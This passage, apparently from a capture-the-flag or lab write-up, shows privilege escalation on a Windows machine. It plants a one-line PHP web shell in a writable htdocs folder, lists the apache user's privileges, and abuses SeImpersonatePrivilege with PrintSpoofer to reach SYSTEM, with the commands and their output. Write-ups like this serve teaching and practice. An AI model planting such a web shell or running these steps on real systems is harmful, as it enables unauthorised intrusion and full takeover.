There is also another user called apache. We also have write access to the htdocs folder which means that we can attempt to get code execution as that user apache.
I created a php file that to the htdocs folder where the other php files were.
<pre>
<?php
system($_GET['cmd']);
?>
</pre>
After getting another shell as the apache user.
I enumerated the Privileges of the user apache.
C:\Users\apache>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeTcbPrivilege Act as part of the operating system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
I used PrintSpoofer to get Administrator.
C:\Users\apache>PrintSpoofer.exe -i -c cmd.exe
PrintSpoofer.exe -i -c cmd.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.17763.2029]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
